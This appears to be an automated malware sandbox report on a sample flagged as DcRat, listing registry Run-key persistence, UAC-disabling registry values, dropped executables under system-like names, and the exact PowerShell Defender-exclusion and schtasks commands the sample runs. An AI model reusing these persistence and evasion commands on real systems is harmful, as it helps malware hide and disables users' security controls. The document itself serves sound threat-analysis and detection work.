Set value (str)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Windows\CurrentVersion\Run\0a0a64f3c4fa7d960be983aa0a7d0ce8 = "\"C:\\Program Files (x86)\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\0a0a64f3c4fa7d960be983aa0a7d0ce8.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\Microsoft.NET\\csrss.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Program Files (x86)\\Windows Defender\\fr-FR\\explorer.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\explorer.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\MSOCache\\All Users\\csrss.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\dwm.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WMIADAP = "\"C:\\Program Files\\Windows NT\\TableTextService\\de-DE\\WMIADAP.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0a0a64f3c4fa7d960be983aa0a7d0ce8 = "\"C:\\Recovery\\5e97ab82-6219-11ed-b9ee-5e34c4ab0fa3\\0a0a64f3c4fa7d960be983aa0a7d0ce8.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Program Files\\Windows Journal\\Templates\\smss.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Windows\CurrentVersion\Run\WMIADAP = "\"C:\\Program Files (x86)\\Common Files\\WMIADAP.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\MSOCache\\All Users\\csrss.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Recovery\\5e97ab82-6219-11ed-b9ee-5e34c4ab0fa3\\csrss.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\Program Files\\Uninstall Information\\System.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\Users\\All Users\\wininit.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\smss.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\smss.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Program Files (x86)\\Windows Defender\\fr-FR\\explorer.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\explorer.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Windows\CurrentVersion\Run\WMIADAP = "\"C:\\Program Files\\Windows NT\\TableTextService\\de-DE\\WMIADAP.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Windows\CurrentVersion\Run\0a0a64f3c4fa7d960be983aa0a7d0ce8 = "\"C:\\Recovery\\5e97ab82-6219-11ed-b9ee-5e34c4ab0fa3\\0a0a64f3c4fa7d960be983aa0a7d0ce8.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WMIADAP = "\"C:\\Program Files (x86)\\Common Files\\WMIADAP.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\explorer.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\smss.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\wininit.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\dwm.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\Microsoft.NET\\csrss.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

0a0a64f3c4fa7d960be983aa0a7d0ce8.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe

Drops file in Program Files directory 45 IoCs

Processes:

0a0a64f3c4fa7d960be983aa0a7d0ce8.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Common Files\RCXD744.tmp	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
File opened for modification	C:\Program Files (x86)\Windows NT\TableTextService\it-IT\RCX8BC4.tmp	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
File created	C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\1033\6cb0b6c459d5d3	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\1033\RCXBCAD.tmp	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\1033\dwm.exe	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
File created	C:\Program Files (x86)\Windows Defender\fr-FR\7a0fd90576e088	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
File created	C:\Program Files (x86)\Windows Defender\fr-FR\explorer.exe	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\RCX9C89.tmp	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\RCX9F67.tmp	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
File opened for modification	C:\Program Files (x86)\Common Files\WMIADAP.exe	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
File opened for modification	C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\0a0a64f3c4fa7d960be983aa0a7d0ce8.exe	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
File created	C:\Program Files (x86)\Windows NT\TableTextService\it-IT\smss.exe	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
File created	C:\Program Files (x86)\Common Files\75a57c1bdf437c	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
File created	C:\Program Files\Windows Journal\Templates\smss.exe	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
File created	C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\0a0a64f3c4fa7d960be983aa0a7d0ce8.exe	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\explorer.exe	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
File opened for modification	C:\Program Files\Windows Journal\Templates\RCXEAC8.tmp	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
File opened for modification	C:\Program Files\Uninstall Information\RCX148F.tmp	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
File created	C:\Program Files (x86)\Common Files\WMIADAP.exe	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
File created	C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\6cb0b6c459d5d3	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
File created	C:\Program Files\Uninstall Information\System.exe	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\1033\RCXB9EE.tmp	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
File opened for modification	C:\Program Files\Windows NT\TableTextService\de-DE\WMIADAP.exe	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
File opened for modification	C:\Program Files\Windows Journal\Templates\RCXED87.tmp	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
File opened for modification	C:\Program Files\Windows Journal\Templates\smss.exe	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
File opened for modification	C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\RCX10B.tmp	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
File created	C:\Program Files\Windows NT\TableTextService\de-DE\WMIADAP.exe	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
File opened for modification	C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\dwm.exe	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
File created	C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\c040f93204fd2c	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
File opened for modification	C:\Program Files\Windows NT\TableTextService\de-DE\RCXC67F.tmp	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
File opened for modification	C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\RCXFE4C.tmp	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
File opened for modification	C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\RCX80E.tmp	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
File opened for modification	C:\Program Files\Uninstall Information\RCX11D0.tmp	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
File created	C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\1033\dwm.exe	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
File created	C:\Program Files\Windows NT\TableTextService\de-DE\75a57c1bdf437c	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
File created	C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\dwm.exe	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
File opened for modification	C:\Program Files (x86)\Windows NT\TableTextService\it-IT\RCX8905.tmp	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
File opened for modification	C:\Program Files (x86)\Windows NT\TableTextService\it-IT\smss.exe	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
File opened for modification	C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\RCXACD.tmp	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
File created	C:\Program Files (x86)\Windows NT\TableTextService\it-IT\69ddcba757bf72	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
File created	C:\Program Files\Uninstall Information\27d1bcfc3c54e0	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
File opened for modification	C:\Program Files\Windows NT\TableTextService\de-DE\RCXC3B0.tmp	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
File opened for modification	C:\Program Files (x86)\Common Files\RCXDA03.tmp	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
File opened for modification	C:\Program Files\Uninstall Information\System.exe	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
File created	C:\Program Files\Windows Journal\Templates\69ddcba757bf72	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe

Drops file in Windows directory 7 IoCs

Processes:

0a0a64f3c4fa7d960be983aa0a7d0ce8.exe

description	ioc	process
File created	C:\Windows\Microsoft.NET\886983d96e3d3e	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
File opened for modification	C:\Windows\Microsoft.NET\RCX1B92.tmp	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
File opened for modification	C:\Windows\Microsoft.NET\RCX1E51.tmp	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
File opened for modification	C:\Windows\Microsoft.NET\csrss.exe	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
File created	C:\Windows\rescache\rc0000\services.exe	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
File created	C:\Windows\Speech\Common\fr-FR\taskhost.exe	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
File created	C:\Windows\Microsoft.NET\csrss.exe	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe

Creates scheduled task(s) 1 TTPs 54 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
1328	schtasks.exe
1808	schtasks.exe
1512	schtasks.exe
1652	schtasks.exe
2180	schtasks.exe
2208	schtasks.exe
2440	schtasks.exe
1624	schtasks.exe
2256	schtasks.exe
2424	schtasks.exe
2468	schtasks.exe
1628	schtasks.exe
2084	schtasks.exe
556	schtasks.exe
2064	schtasks.exe
2164	schtasks.exe
1364	schtasks.exe
1312	schtasks.exe
1944	schtasks.exe
604	schtasks.exe
1092	schtasks.exe
2300	schtasks.exe
1276	schtasks.exe
1988	schtasks.exe
1496	schtasks.exe
1976	schtasks.exe
1860	schtasks.exe
2400	schtasks.exe
832	schtasks.exe
1768	schtasks.exe
1156	schtasks.exe
1764	schtasks.exe
684	schtasks.exe
952	schtasks.exe
2284	schtasks.exe
1708	schtasks.exe
964	schtasks.exe
1508	schtasks.exe
276	schtasks.exe
2332	schtasks.exe
2372	schtasks.exe
580	schtasks.exe
2112	schtasks.exe
1792	schtasks.exe
976	schtasks.exe
884	schtasks.exe
1380	schtasks.exe
1096	schtasks.exe
2352	schtasks.exe
2000	schtasks.exe
1068	schtasks.exe
2136	schtasks.exe
2032	schtasks.exe
2228	schtasks.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

0a0a64f3c4fa7d960be983aa0a7d0ce8.exe

pid process

2040 0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

0a0a64f3c4fa7d960be983aa0a7d0ce8.exe

description pid process

Token: SeDebugPrivilege 2040 0a0a64f3c4fa7d960be983aa0a7d0ce8.exe

pid	process
2040	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe

description	pid	process
Token: SeDebugPrivilege	2040	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe

Suspicious use of WriteProcessMemory 24 IoCs

Processes:

0a0a64f3c4fa7d960be983aa0a7d0ce8.exe

description	pid	process	target process
PID 2040 wrote to memory of 2508	2040	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe	powershell.exe
PID 2040 wrote to memory of 2508	2040	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe	powershell.exe
PID 2040 wrote to memory of 2508	2040	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe	powershell.exe
PID 2040 wrote to memory of 2520	2040	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe	powershell.exe
PID 2040 wrote to memory of 2520	2040	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe	powershell.exe
PID 2040 wrote to memory of 2520	2040	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe	powershell.exe
PID 2040 wrote to memory of 2540	2040	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe	powershell.exe
PID 2040 wrote to memory of 2540	2040	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe	powershell.exe
PID 2040 wrote to memory of 2540	2040	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe	powershell.exe
PID 2040 wrote to memory of 2576	2040	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe	powershell.exe
PID 2040 wrote to memory of 2576	2040	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe	powershell.exe
PID 2040 wrote to memory of 2576	2040	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe	powershell.exe
PID 2040 wrote to memory of 2592	2040	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe	powershell.exe
PID 2040 wrote to memory of 2592	2040	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe	powershell.exe
PID 2040 wrote to memory of 2592	2040	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe	powershell.exe
PID 2040 wrote to memory of 2604	2040	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe	powershell.exe
PID 2040 wrote to memory of 2604	2040	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe	powershell.exe
PID 2040 wrote to memory of 2604	2040	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe	powershell.exe
PID 2040 wrote to memory of 2636	2040	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe	powershell.exe
PID 2040 wrote to memory of 2636	2040	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe	powershell.exe
PID 2040 wrote to memory of 2636	2040	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe	powershell.exe
PID 2040 wrote to memory of 2652	2040	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe	powershell.exe
PID 2040 wrote to memory of 2652	2040	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe	powershell.exe
PID 2040 wrote to memory of 2652	2040	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe	powershell.exe

System policy modification 1 TTPs 3 IoCs

evasion

Modify Registry

Processes:

0a0a64f3c4fa7d960be983aa0a7d0ce8.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe

C:\Users\Admin\AppData\Local\Temp\0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
"C:\Users\Admin\AppData\Local\Temp\0a0a64f3c4fa7d960be983aa0a7d0ce8.exe"
1⤵
- DcRat
- Modifies WinLogon for persistence
- UAC bypass
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2040

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\0a0a64f3c4fa7d960be983aa0a7d0ce8.exe'
2⤵
PID:2508

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\explorer.exe'
2⤵
PID:2520

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\wininit.exe'
2⤵
PID:2540

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows NT\TableTextService\it-IT\smss.exe'
2⤵
PID:2576

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\wininit.exe'
2⤵
PID:2592

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Defender\fr-FR\explorer.exe'
2⤵
PID:2604

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\explorer.exe'
2⤵
PID:2652

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\smss.exe'
2⤵
PID:2636

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\1033\dwm.exe'
2⤵
PID:2712

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\TableTextService\de-DE\WMIADAP.exe'
2⤵
PID:2736

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\5e97ab82-6219-11ed-b9ee-5e34c4ab0fa3\0a0a64f3c4fa7d960be983aa0a7d0ce8.exe'
2⤵
PID:2788

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\explorer.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1276

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\explorer.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1792

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 10 /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\explorer.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1328

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\wininit.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:976

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Users\All Users\wininit.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:832

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\wininit.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1768

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows NT\TableTextService\it-IT\smss.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1708

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows NT\TableTextService\it-IT\smss.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1156

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows NT\TableTextService\it-IT\smss.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:884

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\wininit.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1364

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\wininit.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1312

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\wininit.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1944

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Defender\fr-FR\explorer.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1988

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Defender\fr-FR\explorer.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:964

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Defender\fr-FR\explorer.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1380

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\smss.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2032

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\smss.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2000

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\smss.exe'" /rl HIGHEST /f
1⤵
